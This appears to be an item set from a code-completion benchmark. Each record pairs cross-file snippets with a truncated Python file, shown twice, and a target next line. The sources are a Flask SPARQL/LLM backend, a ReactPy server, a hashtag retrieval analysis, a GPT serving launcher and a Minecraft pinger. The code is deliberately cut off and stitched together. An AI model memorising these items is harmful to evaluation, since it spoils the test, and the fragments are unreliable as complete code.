"snippet": "def send_setup_message(thread: Thread) -> ThreadMessage:\n msg = (\n \"The file ontology.ttl has an RDF ontology in turtle syntax. \"\n + \"Please review the contents of the file. \"\n + \"After that each prompt will ask you to create a SPARQL query for a certain question, \"\n + \"using ONLY information from ontology.ttl. \"\n + \"Always add: PREFIX edu: <YOUR_ONTOLOGY.TTL_PATH_HERE> to your queries\"\n )\n return CLIENT.beta.threads.messages.create(\n thread_id=thread.id, role=\"user\", content=msg\n )"
},
{
"identifier": "send_user_message",
"path": "backend/llm/threads.py",
"snippet": "def send_user_message(thread: Thread, msg: str) -> ThreadMessage:\n return CLIENT.beta.threads.messages.create(\n thread_id=thread.id, role=\"user\", content=__contextualize_user_message(msg)\n )"
},
{
"identifier": "create_run_for_thread",
"path": "backend/llm/threads.py",
"snippet": "def create_run_for_thread(thread: Thread, run: Optional[Run] = None) -> Run:\n if not run:\n return CLIENT.beta.threads.runs.create(\n thread_id=thread.id, assistant_id=ASSISTANT.id\n )\n\n run_info = retrieve_run_for_user(run_id=run.id, thread_id=thread.id)\n while run.status != \"completed\":\n run_info = retrieve_run_for_user(run_id=run_info.id, thread_id=thread.id)\n\n return CLIENT.beta.threads.runs.create(\n thread_id=thread.id, assistant_id=ASSISTANT.id\n )"
},
{
"identifier": "retrieve_run_for_user",
"path": "backend/llm/threads.py",
"snippet": "def retrieve_run_for_user(run_id: str, thread_id: str) -> Run:\n return CLIENT.beta.threads.runs.retrieve(run_id=run_id, thread_id=thread_id)"
},
{
"identifier": "get_last_message",
"path": "backend/llm/threads.py",
"snippet": "def get_last_message(thread: Thread, run: Run) -> ThreadMessage:\n # wait untill the message is done writing\n # this does not have any fail exits\n run_info = CLIENT.beta.threads.runs.retrieve(run_id=run.id, thread_id=thread.id)\n while run_info.status != \"completed\":\n run_info = CLIENT.beta.threads.runs.retrieve(run_id=run.id, thread_id=thread.id)\n\n return list(msg for msg in CLIENT.beta.threads.messages.list(thread.id))[0]"
},
{
"identifier": "get_query_from_message",
"path": "backend/llm/threads.py",
"snippet": "def get_query_from_message(msg: ThreadMessage) -> Optional[str]:\n raw_msg = msg.content[0].text.value\n start_delim = r\"```sparql\"\n end_delim = r\"```\"\n\n start_index = raw_msg.find(start_delim)\n end_index = raw_msg.find(end_delim, start_index + len(start_delim))\n\n if start_index != -1 and end_index != -1:\n return raw_msg[start_index + len(start_delim) : end_index]\n\n return None"
},
{
"identifier": "apply_query",
"path": "backend/ontology/queries.py",
"snippet": "def apply_query(query: str) -> Result:\n return GRAPH.query(query_object=query)"
},
{
"identifier": "query_results_to_table",
"path": "backend/ontology/queries.py",
"snippet": "def query_results_to_table(results: Result) -> Dict:\n return {\n __readable_property_name(str(key)): [\n __clean_property_value(str(row[key])) for row in results\n ]\n for key in results.__dict__[\"vars\"]\n }"
},
{
"identifier": "SendMessageRequest",
"path": "backend/server/endpoints/custom_types.py",
"snippet": "class SendMessageRequest(TypedDict):\n thread_id: str\n run_id: str\n msg: str"
},
{
"identifier": "SetupUserResponse",
"path": "backend/server/endpoints/custom_types.py",
"snippet": "class SetupUserResponse(TypedDict):\n thread_id: str\n run_id: str"
}
] | from flask import Blueprint, abort, request, jsonify
from backend.llm.threads import (
make_thread_for_user,
retrieve_thread_for_user,
send_setup_message,
send_user_message,
create_run_for_thread,
retrieve_run_for_user,
get_last_message,
get_query_from_message,
)
from backend.ontology.queries import apply_query, query_results_to_table
from backend.server.endpoints.custom_types import SendMessageRequest, SetupUserResponse | 1,080 |
bp = Blueprint("llm", __name__)
@bp.route("/setup", methods=["GET"])
def setup_user() -> SetupUserResponse:
thread = make_thread_for_user()
_ = send_setup_message(thread)
|
bp = Blueprint("llm", __name__)
@bp.route("/setup", methods=["GET"])
def setup_user() -> SetupUserResponse:
thread = make_thread_for_user()
_ = send_setup_message(thread) | run = create_run_for_thread(thread) # for easier expansion of the API | 4 | 2023-12-21 17:55:05+00:00 | 2k |
stevej2608/reactpy-apexcharts | utils/fast_server.py | [
{
"identifier": "log",
"path": "utils/logger.py",
"snippet": ""
},
{
"identifier": "var_name",
"path": "utils/var_name.py",
"snippet": "def var_name(obj: Any, namespace: Dict[str, Any]) -> str:\r\n \"\"\"Return var name as a string\r\n\r\n Args:\r\n obj (Any): Variable ty be named\r\n namespace (Dict[str, Any]): _description_\r\n\r\n Returns:\r\n str: The objects name\r\n\r\n Usage:\r\n ```\r\n from utils.var_name import var_name\r\n \r\n app = FastAPI(...)\r\n\r\n app_name = var_name(app, globals())\r\n ```\r\n \"\"\"\r\n return [name for name in namespace if namespace[name] is obj][0]\r"
},
{
"identifier": "DEFAULT_OPTIONS",
"path": "utils/fast_server_options.py",
"snippet": "DEFAULT_OPTIONS=Options(\r\n head=html.head(\r\n html.meta(META_VIEWPORT),\r\n html.meta(META_COLOR),\r\n html.title(PAGE_HEADER_TITLE),\r\n )\r\n)\r"
}
] | from typing import Callable
from fastapi import FastAPI
from reactpy.core.component import Component
from reactpy.backend.fastapi import configure, Options
from .logger import log, logging
from .var_name import var_name
from .fast_server_options import DEFAULT_OPTIONS
import sys
import signal
import multiprocessing
import uvicorn | 802 |
app = FastAPI(description="ReactPy", version="0.1.0")
LOGS = [
"asgi-logger",
"concurrent.futures",
"concurrent",
"asyncio",
"uvicorn.error",
"uvicorn",
"watchfiles.watcher",
"watchfiles",
"watchfiles.main",
"fastapi",
"reactpy.backend",
"reactpy",
"reactpy._option",
"reactpy.core.hooks",
"reactpy.core",
"urllib3.util.retry",
"urllib3.util",
"urllib3",
"urllib3.connection",
"urllib3.response",
"urllib3.connectionpool",
"urllib3.poolmanager",
"charset_normalizer",
"requests",
"reactpy.web.utils",
"reactpy.web",
"reactpy.web.module",
"reactpy.backend.utils",
"reactpy.core.layout",
"reactpy.core.serve",
"reactpy.backend.starlette",
"uvicorn.access",
"starlette",
]
def disable_noisy_logs():
# Turn off noisy logging
for log_id in LOGS:
_log = logging.getLogger(log_id)
_log.setLevel(logging.ERROR)
def handler(signum, frame):
active = multiprocessing.active_children()
for child in active:
child.terminate()
def run(AppMain: Callable[[], Component],
options:Options=DEFAULT_OPTIONS,
host='127.0.0.1',
port=8000,
disable_server_logs=False,
**kwargs) -> None:
"""Called once to run reactpy application on the fastapi server
Args:
AppMain (Callable[[], Component]): Function that returns a reactpy Component
options (Options, optional): Server options. Defaults to DASHBOARD_OPTIONS.
Usage:
```
@component
def AppMain():
return html.h2('Hello from reactPy!')
)
run(AppMain, options=PICO_OPTIONS)
```
"""
def _app_path(app: FastAPI) -> str:
app_str = var_name(app, globals())
return f"{__name__}:{app_str}"
configure(app, AppMain, options=options)
app_path = _app_path(app)
@app.on_event('startup')
async def fastapi_startup():
if disable_server_logs:
disable_noisy_logs()
|
app = FastAPI(description="ReactPy", version="0.1.0")
LOGS = [
"asgi-logger",
"concurrent.futures",
"concurrent",
"asyncio",
"uvicorn.error",
"uvicorn",
"watchfiles.watcher",
"watchfiles",
"watchfiles.main",
"fastapi",
"reactpy.backend",
"reactpy",
"reactpy._option",
"reactpy.core.hooks",
"reactpy.core",
"urllib3.util.retry",
"urllib3.util",
"urllib3",
"urllib3.connection",
"urllib3.response",
"urllib3.connectionpool",
"urllib3.poolmanager",
"charset_normalizer",
"requests",
"reactpy.web.utils",
"reactpy.web",
"reactpy.web.module",
"reactpy.backend.utils",
"reactpy.core.layout",
"reactpy.core.serve",
"reactpy.backend.starlette",
"uvicorn.access",
"starlette",
]
def disable_noisy_logs():
# Turn off noisy logging
for log_id in LOGS:
_log = logging.getLogger(log_id)
_log.setLevel(logging.ERROR)
def handler(signum, frame):
active = multiprocessing.active_children()
for child in active:
child.terminate()
def run(AppMain: Callable[[], Component],
options:Options=DEFAULT_OPTIONS,
host='127.0.0.1',
port=8000,
disable_server_logs=False,
**kwargs) -> None:
"""Called once to run reactpy application on the fastapi server
Args:
AppMain (Callable[[], Component]): Function that returns a reactpy Component
options (Options, optional): Server options. Defaults to DASHBOARD_OPTIONS.
Usage:
```
@component
def AppMain():
return html.h2('Hello from reactPy!')
)
run(AppMain, options=PICO_OPTIONS)
```
"""
def _app_path(app: FastAPI) -> str:
app_str = var_name(app, globals())
return f"{__name__}:{app_str}"
configure(app, AppMain, options=options)
app_path = _app_path(app)
@app.on_event('startup')
async def fastapi_startup():
if disable_server_logs:
disable_noisy_logs() | log.info("Uvicorn running on http://%s:%s (Press CTRL+C to quit)", host, port) | 0 | 2023-12-19 16:05:41+00:00 | 2k |
ict-bigdatalab/RIGHT | retrieval_analysis.py | [
{
"identifier": "read_line_examples_from_file",
"path": "get_datasets.py",
"snippet": "def read_line_examples_from_file(data_path):\n sequence = []\n with open(data_path, 'r', encoding='utf-8') as f:\n for line in f:\n line = line.strip(\"\\n\")\n if not line:\n continue\n sequence.append(line.strip())\n return sequence"
},
{
"identifier": "f1",
"path": "eval_utils.py",
"snippet": "def f1(pre, rec):\n if pre == 0 and rec == 0:\n return 0.0\n return 2 * pre * rec / (pre + rec)"
}
] | import json
from get_datasets import read_line_examples_from_file
from tqdm import tqdm
from eval_utils import f1 | 816 |
def get_hashtag_list(dst):
tags = dst.split('[SEP]')
target = []
for j in range(len(tags)):
tags[j] = tags[j].strip()
if tags[j] != '':
target.append(tags[j])
# if the dst is nothing
if len(target) == 0:
target.append('None')
# statistic_hashtags(hashtags)
return target
def retrieval_analysis(src_path, label_path, rev_index_path, document_path, out_path):
src_list = read_line_examples_from_file(src_path)
dst_list = read_line_examples_from_file(label_path)
document_list = read_line_examples_from_file(document_path)
with open(rev_index_path, 'r', encoding='UTF-8') as fp:
rev_index = json.load(fp)
rev_dst = [[document_list[index] for index in rev_index[i]["index"]] for i in range(len(src_list))]
with open(out_path, 'w', encoding='UTF-8') as fp:
for i in tqdm(range(len(src_list))):
line = str(i) + '\n' + src_list[i] + '\n' + dst_list[i] + '\n'
for k in range(len(rev_dst[i])):
line = line + str(rev_index[i]['score'][k]) + '\t' + rev_dst[i][k] + '\n'
line += '\n'
fp.write(line)
def retrieval_hashtag_score_analysis(src_path, label_path, rev_index_path, document_path, top_k):
src_list = read_line_examples_from_file(src_path)
dst_list = read_line_examples_from_file(label_path)
document_list = read_line_examples_from_file(document_path)
with open(rev_index_path, 'r', encoding='UTF-8') as fp:
rev_index = json.load(fp)
rev_dst = [[get_hashtag_list(document_list[index]) for index in rev_index[i]["index"]] for i in range(len(src_list))]
dst_list = [get_hashtag_list(dst) for dst in dst_list]
total_p = 0
total_r = 0
true_num = 0
for i in tqdm(range(len(src_list))):
label = dst_list[i]
hashtag_score = dict()
for k in range(len(rev_dst[i])):
for rev_hashtag in rev_dst[i][k]:
if rev_hashtag not in hashtag_score.keys():
hashtag_score[rev_hashtag] = 0
hashtag_score[rev_hashtag] += rev_index[i]['score'][k]
hashtag_score = sorted(hashtag_score.items(), key=lambda x: x[1], reverse=True)[:top_k]
total_p += len(hashtag_score)
total_r += len(label)
for rev_hashtag_pair in hashtag_score:
for lab in label:
if rev_hashtag_pair[0] == lab or rev_hashtag_pair[0] in lab or lab in rev_hashtag_pair[0]:
true_num += 1
p = true_num / total_p
r = true_num / total_r
|
def get_hashtag_list(dst):
tags = dst.split('[SEP]')
target = []
for j in range(len(tags)):
tags[j] = tags[j].strip()
if tags[j] != '':
target.append(tags[j])
# if the dst is nothing
if len(target) == 0:
target.append('None')
# statistic_hashtags(hashtags)
return target
def retrieval_analysis(src_path, label_path, rev_index_path, document_path, out_path):
src_list = read_line_examples_from_file(src_path)
dst_list = read_line_examples_from_file(label_path)
document_list = read_line_examples_from_file(document_path)
with open(rev_index_path, 'r', encoding='UTF-8') as fp:
rev_index = json.load(fp)
rev_dst = [[document_list[index] for index in rev_index[i]["index"]] for i in range(len(src_list))]
with open(out_path, 'w', encoding='UTF-8') as fp:
for i in tqdm(range(len(src_list))):
line = str(i) + '\n' + src_list[i] + '\n' + dst_list[i] + '\n'
for k in range(len(rev_dst[i])):
line = line + str(rev_index[i]['score'][k]) + '\t' + rev_dst[i][k] + '\n'
line += '\n'
fp.write(line)
def retrieval_hashtag_score_analysis(src_path, label_path, rev_index_path, document_path, top_k):
src_list = read_line_examples_from_file(src_path)
dst_list = read_line_examples_from_file(label_path)
document_list = read_line_examples_from_file(document_path)
with open(rev_index_path, 'r', encoding='UTF-8') as fp:
rev_index = json.load(fp)
rev_dst = [[get_hashtag_list(document_list[index]) for index in rev_index[i]["index"]] for i in range(len(src_list))]
dst_list = [get_hashtag_list(dst) for dst in dst_list]
total_p = 0
total_r = 0
true_num = 0
for i in tqdm(range(len(src_list))):
label = dst_list[i]
hashtag_score = dict()
for k in range(len(rev_dst[i])):
for rev_hashtag in rev_dst[i][k]:
if rev_hashtag not in hashtag_score.keys():
hashtag_score[rev_hashtag] = 0
hashtag_score[rev_hashtag] += rev_index[i]['score'][k]
hashtag_score = sorted(hashtag_score.items(), key=lambda x: x[1], reverse=True)[:top_k]
total_p += len(hashtag_score)
total_r += len(label)
for rev_hashtag_pair in hashtag_score:
for lab in label:
if rev_hashtag_pair[0] == lab or rev_hashtag_pair[0] in lab or lab in rev_hashtag_pair[0]:
true_num += 1
p = true_num / total_p
r = true_num / total_r | f = f1(p, r) | 1 | 2023-12-16 06:00:53+00:00 | 2k |
shell-nlp/gpt_server | gpt_server/serving/main.py | [
{
"identifier": "get_free_tcp_port",
"path": "gpt_server/utils.py",
"snippet": "def get_free_tcp_port():\n \"\"\"获取可用的端口\"\"\"\n tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n tcp.bind((\"\", 0))\n _, port = tcp.getsockname()\n tcp.close()\n return port"
},
{
"identifier": "start_server",
"path": "gpt_server/utils.py",
"snippet": "def start_server(host, port):\n \"\"\"启动服务\"\"\"\n start_controller()\n start_openai_server(host, port)"
},
{
"identifier": "run_cmd",
"path": "gpt_server/utils.py",
"snippet": "def run_cmd(cmd):\n print(\"执行命令命令如下:\")\n print(cmd) # 执行\n subprocess.run(cmd, shell=True)"
},
{
"identifier": "stop_server",
"path": "gpt_server/utils.py",
"snippet": "def stop_server():\n \"\"\"停止服务\"\"\"\n stop_fastchat = (\n \"ps -ef | grep fastchat.serve | awk '{print $2}' |xargs -I{} kill -9 {}\"\n )\n stop_gpt_server = (\n \"ps -ef | grep gpt_server | awk '{print $2}' |xargs -I{} kill -9 {}\"\n )\n run_cmd(stop_fastchat)\n run_cmd(stop_gpt_server)\n print(\"停止服务成功!\")"
},
{
"identifier": "delete_log",
"path": "gpt_server/utils.py",
"snippet": "def delete_log(root_path):\n datanames = os.listdir(os.path.join(root_path, \"serving\")) # 查找本目录下所有文件\n for dataname in datanames:\n if (\n dataname.startswith(\"model_worker\")\n or dataname.startswith(\"openai_api_server\")\n or dataname.startswith(\"controller.log\")\n ):\n # print(os.path.join(root_path,f\"serving/{dataname}\"))\n os.remove(os.path.join(root_path, f\"serving/{dataname}\"))"
}
] | import yaml
import os
import sys
import subprocess
import signal
from pprint import pprint
from multiprocessing import Process
from gpt_server.utils import get_free_tcp_port, start_server, run_cmd, stop_server,delete_log | 1,037 |
# 配置根目录
root_dir = os.path.join(os.path.dirname(__file__), "..")
root_dir = os.path.abspath(root_dir)
sys.path.append(root_dir)
# 删除日志
delete_log(root_dir)
def signal_handler(signum, frame):
stop_server()
raise KeyboardInterrupt
signal.signal(signal.SIGINT, signal_handler)
with open("./config.yaml", "r") as f:
config = yaml.safe_load(f)
print(config)
# ----------------------------启动 Controller 和 Openai API 服务----------------------------------------------------
host = config["serve_args"]["host"]
port = config["serve_args"]["port"]
start_server(host, port)
# ----------------------------启动 Controller 和 Openai API 服务----------------------------------------------------
for model_name, model_config in config["models"].items():
# 启用的模型
if model_config["enable"]:
pprint(model_config)
print()
# 模型地址
model_name_or_path = model_config["model_name_or_path"]
# 模型类型
model_type = model_config["model_type"]
# model type 校验
py_path = f"{root_dir}/model_worker/{model_type}.py"
model_names = model_name
if model_config["alias"]:
model_names = model_name + "," + model_config["alias"]
# 获取 worker 数目 并获取每个 worker 的资源
workers = model_config["workers"]
# if model_config["work_mode"] == "deepspeed":
# 设置使用 deepspeed
process = []
for worker in workers:
gpus = worker["gpus"]
# 将gpus int ---> str
gpus = [str(i) for i in gpus]
gpus_str = ",".join(gpus)
num_gpus = len(gpus)
if model_config["work_mode"] == "deepspeed":
os.environ["USE_DS"] = "1"
run_mode = f"deepspeed --num_gpus {num_gpus} "
pass
elif model_config["work_mode"] == "accelerate":
os.environ["USE_ACC"] = "1"
os.environ["CUDA_VISIBLE_DEVICES"] = gpus_str
run_mode = "python "
pass
elif model_config["work_mode"] == "hf":
os.environ["CUDA_VISIBLE_DEVICES"] = gpus_str
run_mode = "python "
pass
# DS 只能在代码内部起效
# os.environ["CUDA_VISIBLE_DEVICES"] = gpus_str
cmd = (
run_mode
+ py_path
+ f" --gpus {gpus_str}"
|
# 配置根目录
root_dir = os.path.join(os.path.dirname(__file__), "..")
root_dir = os.path.abspath(root_dir)
sys.path.append(root_dir)
# 删除日志
delete_log(root_dir)
def signal_handler(signum, frame):
stop_server()
raise KeyboardInterrupt
signal.signal(signal.SIGINT, signal_handler)
with open("./config.yaml", "r") as f:
config = yaml.safe_load(f)
print(config)
# ----------------------------启动 Controller 和 Openai API 服务----------------------------------------------------
host = config["serve_args"]["host"]
port = config["serve_args"]["port"]
start_server(host, port)
# ----------------------------启动 Controller 和 Openai API 服务----------------------------------------------------
for model_name, model_config in config["models"].items():
# 启用的模型
if model_config["enable"]:
pprint(model_config)
print()
# 模型地址
model_name_or_path = model_config["model_name_or_path"]
# 模型类型
model_type = model_config["model_type"]
# model type 校验
py_path = f"{root_dir}/model_worker/{model_type}.py"
model_names = model_name
if model_config["alias"]:
model_names = model_name + "," + model_config["alias"]
# 获取 worker 数目 并获取每个 worker 的资源
workers = model_config["workers"]
# if model_config["work_mode"] == "deepspeed":
# 设置使用 deepspeed
process = []
for worker in workers:
gpus = worker["gpus"]
# 将gpus int ---> str
gpus = [str(i) for i in gpus]
gpus_str = ",".join(gpus)
num_gpus = len(gpus)
if model_config["work_mode"] == "deepspeed":
os.environ["USE_DS"] = "1"
run_mode = f"deepspeed --num_gpus {num_gpus} "
pass
elif model_config["work_mode"] == "accelerate":
os.environ["USE_ACC"] = "1"
os.environ["CUDA_VISIBLE_DEVICES"] = gpus_str
run_mode = "python "
pass
elif model_config["work_mode"] == "hf":
os.environ["CUDA_VISIBLE_DEVICES"] = gpus_str
run_mode = "python "
pass
# DS 只能在代码内部起效
# os.environ["CUDA_VISIBLE_DEVICES"] = gpus_str
cmd = (
run_mode
+ py_path
+ f" --gpus {gpus_str}" | + f" --master_port {get_free_tcp_port()}" | 0 | 2023-12-16 07:43:28+00:00 | 2k |
LLM-Evaluation-s-Always-Fatiguing/leaf-playground-hub | rag_qa/rag_qa/scene.py | [
{
"identifier": "Examiner",
"path": "rag_qa/rag_qa/agents/examiner.py",
"snippet": "class Examiner(SceneStaticAgent, role_definition=ROLE_DEFINITION, cls_description=\"An agent who minitor the examine\"):\n config_cls = ExaminerConfig\n config: config_cls\n\n def __init__(self, config: config_cls):\n super().__init__(config=config)\n\n self._cur = 0\n self._questions = []\n self._dataset_config: DatasetConfig = None\n\n def prepare_questions(\n self,\n dataset_config: DatasetConfig,\n ) -> None:\n self._cur = 0\n self._questions = prepare_dataset(dataset_config)\n self._dataset_config = dataset_config\n\n def send_question(self, receivers: List[Profile]) -> ExaminerQuestion:\n question = ExaminerQuestion(\n sender=self.profile,\n receivers=receivers,\n content=Text(text=self._questions[self._cur][self._dataset_config.question_column]),\n question_id=self._cur\n )\n self._cur += 1\n return question\n\n def check_examine_finish(self) -> bool:\n return self._cur >= len(self._questions)\n\n def get_golden_answer(self, question_id: int) -> Optional[dict]:\n result = {}\n if self._dataset_config.golden_answer_column:\n result['golden_answer'] = self._questions[question_id][self._dataset_config.golden_answer_column]\n if self._dataset_config.ground_truth_column:\n result['ground_truths'] = self._questions[question_id][self._dataset_config.ground_truth_column]\n return result"
},
{
"identifier": "AIBaseExaminee",
"path": "rag_qa/rag_qa/agents/base_examinee.py",
"snippet": "class AIBaseExaminee(SceneAIAgent, ABC, role_definition=ROLE_DEFINITION):\n config_cls = AIBaseExamineeConfig\n config: config_cls\n\n @abstractmethod\n async def answer_question(self, question: ExaminerQuestion, examiner: Profile) -> ExamineeAnswer:\n pass"
},
{
"identifier": "DatasetConfig",
"path": "rag_qa/rag_qa/dataset_utils.py",
"snippet": "class DatasetConfig(_Config):\n path: str = Field(default=\"explodinggradients/fiqa\")\n split: str = Field(default=\"baseline\")\n question_column: str = Field(default=\"question\")\n golden_answer_column: str = Field(default=\"answer\")\n ground_truth_column: str = Field(default=\"ground_truths\")\n num_questions: int = Field(default=-1)\n filter_conditions: Optional[List[DynamicFn]] = Field(default=None)\n question_preprocessor: Optional[DynamicFn] = Field(default=None)\n name: Optional[str] = Field(default=None)\n data_dir: Optional[str] = Field(default=None)\n data_files: Optional[List[str]] = Field(default=None)\n\n def model_post_init(self, __context: Any) -> None:\n if self.num_questions < -1 or self.num_questions == 0:\n raise ValueError(f\"num_questions should be -1 or positive, got {self.num_questions}\")"
},
{
"identifier": "ExamineeAnswer",
"path": "rag_qa/rag_qa/scene_definition.py",
"snippet": "def avg_fn(records: List[_RecordData]) -> AggregationMethodOutput:\nclass ExaminerQuestion(TextMessage):\nclass ExamineeAnswer(JsonMessage):\nSCENE_DEFINITION = SceneDefinition(\n name=\"RAG QA Examine\",\n description=\"Retrieval Augmented Generation Question Answering Examine Scene. The evaluator powered by ragas.\",\n roles=[\n RoleDefinition(\n name=\"examiner\",\n description=\"the one that participants in a rag based qa examine to monitor the examinees\",\n num_agents_range=(1, 1),\n is_static=True,\n actions=[]\n ),\n RoleDefinition(\n name=\"examinee\",\n description=\"the one that participants in a rag based qa examine to answer questions\",\n num_agents_range=(1, -1),\n is_static=False,\n actions=[\n ActionDefinition(\n name=\"answer_question\",\n description=\"answering the question sent by examiner\",\n signature=ActionSignatureDefinition(\n parameters=[\n ActionSignatureParameterDefinition(\n name=\"question\",\n annotation=ExaminerQuestion\n ),\n ActionSignatureParameterDefinition(\n name=\"examiner\",\n annotation=Profile\n )\n ],\n return_annotation=ExamineeAnswer,\n is_static_method=False\n ),\n metrics=MetricDefinitionList,\n )\n ]\n )\n ],\n env_vars=[]\n)"
}
] | import asyncio
from typing import List, Optional
from pydantic import Field
from leaf_playground.core.workers import Logger
from leaf_playground.core.scene import Scene
from leaf_playground.core.scene_definition import SceneConfig
from leaf_playground.data.log_body import ActionLogBody
from leaf_playground.data.media import Text, Json
from .agents.examiner import Examiner
from .agents.base_examinee import AIBaseExaminee
from .dataset_utils import DatasetConfig
from .scene_definition import ExamineeAnswer, ExaminerQuestion, MessageType, SCENE_DEFINITION | 1,386 |
class RagSceneLogBody(ActionLogBody):
references: Optional[List[MessageType]] = Field(default=None)
response: MessageType = Field(default=...)
ground_truth: Optional[Json] = Field(default=None)
RagSceneConfig = SceneConfig.create_config_model(
SCENE_DEFINITION,
additional_config_fields={"dataset_config": (DatasetConfig, Field(default=...))}
)
class RagScene(Scene, scene_definition=SCENE_DEFINITION, log_body_class=RagSceneLogBody):
config_cls = RagSceneConfig
config: config_cls
def __init__(self, config: config_cls, logger: Logger):
super().__init__(config=config, logger=logger)
self.examiner: Examiner = self.static_agents["examiner"][0]
self.examinees: List[AIBaseExaminee] = self.agents["examinee"]
async def _run(self):
async def examinee_answer(examinee: AIBaseExaminee, q: ExaminerQuestion) -> None:
try:
|
class RagSceneLogBody(ActionLogBody):
references: Optional[List[MessageType]] = Field(default=None)
response: MessageType = Field(default=...)
ground_truth: Optional[Json] = Field(default=None)
RagSceneConfig = SceneConfig.create_config_model(
SCENE_DEFINITION,
additional_config_fields={"dataset_config": (DatasetConfig, Field(default=...))}
)
class RagScene(Scene, scene_definition=SCENE_DEFINITION, log_body_class=RagSceneLogBody):
config_cls = RagSceneConfig
config: config_cls
def __init__(self, config: config_cls, logger: Logger):
super().__init__(config=config, logger=logger)
self.examiner: Examiner = self.static_agents["examiner"][0]
self.examinees: List[AIBaseExaminee] = self.agents["examinee"]
async def _run(self):
async def examinee_answer(examinee: AIBaseExaminee, q: ExaminerQuestion) -> None:
try: | answer: ExamineeAnswer = await examinee.answer_question(question=q, examiner=self.examiner.profile) | 3 | 2023-12-21 03:09:08+00:00 | 2k |
djkcyl/ABot-NT | func/tool/mcping/mcping.py | [
{
"identifier": "SelfPicture",
"path": "utils/message/picture.py",
"snippet": "class SelfPicture:\n def __init__(self) -> None:\n self.s3file = Launart.current().get_component(S3FileService).s3file\n\n async def from_name(self, name: str) -> Picture:\n url = await self.s3file.get_presigned_url(name)\n return Picture(UrlResource(url))\n\n async def from_data(self, data: bytes | BytesIO, image_format: str | None = None) -> Picture:\n # 如果没有指定格式, 那么就尝试从 data 中获取\n if not image_format:\n if isinstance(data, BytesIO):\n image = Image.open(data)\n data.seek(0)\n else:\n image = Image.open(BytesIO(data))\n if image.format:\n image_format = image.format.lower()\n else:\n msg = \"无法获取图片格式\"\n raise ValueError(msg)\n\n # 防止后续操作 data 时出现问题, 先将 data 转换为 bytes\n if isinstance(data, BytesIO):\n data = data.getvalue()\n name = f\"{token_hex(32)}.{image_format}\"\n\n # 根据场景选择上传方式\n ctx = Context.current\n if ctx.scene.path_without_land == \"group\":\n await self.s3file.put_object(name, data, f\"image/{image_format}\", \"temp_image\")\n return await self.from_name(name)\n if ctx.scene.path_without_land in {\"guild.channel\", \"guild.user\"}:\n return Picture(RawResource(data))\n msg = \"不支持的平台\"\n raise NotImplementedError(msg)"
},
{
"identifier": "StatusPing",
"path": "func/tool/mcping/statusping.py",
"snippet": "class StatusPing:\r\n def __init__(self, host: str = \"localhost\", port: int = 25565, timeout: int = 5):\r\n self._host = host\r\n self._port = port\r\n self._timeout = timeout\r\n\r\n @staticmethod\r\n def _unpack_varint(sock: socket.socket) -> int:\r\n data = 0\r\n for i in range(5):\r\n ordinal = sock.recv(1)\r\n if len(ordinal) == 0:\r\n break\r\n\r\n byte = ord(ordinal)\r\n data |= (byte & 0x7F) << 7 * i\r\n\r\n if not byte & 0x80:\r\n break\r\n\r\n return data\r\n\r\n @staticmethod\r\n def _pack_varint(data: int) -> bytes:\r\n ordinal = b\"\"\r\n\r\n while True:\r\n byte = data & 0x7F\r\n data >>= 7\r\n ordinal += struct.pack(\"B\", byte | (0x80 if data > 0 else 0))\r\n\r\n if data == 0:\r\n break\r\n\r\n return ordinal\r\n\r\n def _pack_data(self, data: str | int | float | bytes) -> bytes: # noqa: PYI041\r\n if isinstance(data, str):\r\n data = data.encode(\"utf8\")\r\n return self._pack_varint(len(data)) + data\r\n if isinstance(data, int):\r\n return struct.pack(\"H\", data)\r\n if isinstance(data, float):\r\n return struct.pack(\"Q\", int(data))\r\n return data\r\n\r\n def _send_data(self, connection: socket.socket, *args: str | int | float | bytes) -> None: # noqa: PYI041\r\n data = b\"\"\r\n\r\n for arg in args:\r\n data += self._pack_data(arg)\r\n\r\n connection.send(self._pack_varint(len(data)) + data)\r\n\r\n def _read_fully(self, connection: socket.socket, *, extra_varint: bool = False) -> bytes:\r\n packet_length = self._unpack_varint(connection)\r\n packet_id = self._unpack_varint(connection)\r\n byte = b\"\"\r\n\r\n if extra_varint:\r\n if packet_id > packet_length:\r\n self._unpack_varint(connection)\r\n\r\n extra_length = self._unpack_varint(connection)\r\n\r\n while len(byte) < extra_length:\r\n byte += connection.recv(extra_length)\r\n\r\n else:\r\n byte = connection.recv(packet_length)\r\n\r\n return byte\r\n\r\n def get_status(self) -> dict:\r\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as connection:\r\n connection.settimeout(self._timeout)\r\n connection.connect((self._host, self._port))\r\n self._send_data(connection, b\"\\x00\\x00\", self._host, self._port, b\"\\x01\")\r\n self._send_data(connection, b\"\\x00\")\r\n\r\n data = self._read_fully(connection, extra_varint=True)\r\n\r\n self._send_data(connection, b\"\\x01\", time.time() * 1000)\r\n unix = self._read_fully(connection)\r\n\r\n response: dict = json.loads(data.decode(\"utf8\"))\r\n response[\"ping\"] = int(time.time() * 1000) - struct.unpack(\"Q\", unix)[0]\r\n\r\n return response\r"
}
] | import asyncio
import base64
import contextlib
import json
import re
import dns.resolver
from io import BytesIO
from avilla.core import Picture
from loguru import logger
from PIL import Image
from utils.message.picture import SelfPicture
from .statusping import StatusPing
| 1,539 |
def ping_status(host: str, port: int | None = None) -> dict:
if port is None:
with contextlib.suppress(Exception):
srv_records = dns.resolver.query(f"_minecraft._tcp.{host}", "SRV")
for srv in srv_records:
host = str(srv.target).rstrip(".")
port = srv.port
break
status_ping = StatusPing(host, port or 25565)
status = status_ping.get_status()
status_str = json.dumps(status)
status_str = re.sub(r"\\u00a7.", "", status_str)
status: dict = json.loads(status_str)
logger.debug(status)
return status
def get_server_status(say: str) -> dict:
host, _, port = say.partition(":")
return ping_status(host, int(port) if port else None)
async def handle_favicon(status: dict, messages: list[str | Picture]) -> None:
if favicon := status.get("favicon"):
byte_data = base64.b64decode(f"{favicon[22:-1]}=")
img = Image.open(BytesIO(byte_data)).convert("RGB")
image = BytesIO()
img.save(image, format="JPEG", quality=90)
|
def ping_status(host: str, port: int | None = None) -> dict:
if port is None:
with contextlib.suppress(Exception):
srv_records = dns.resolver.query(f"_minecraft._tcp.{host}", "SRV")
for srv in srv_records:
host = str(srv.target).rstrip(".")
port = srv.port
break
status_ping = StatusPing(host, port or 25565)
status = status_ping.get_status()
status_str = json.dumps(status)
status_str = re.sub(r"\\u00a7.", "", status_str)
status: dict = json.loads(status_str)
logger.debug(status)
return status
def get_server_status(say: str) -> dict:
host, _, port = say.partition(":")
return ping_status(host, int(port) if port else None)
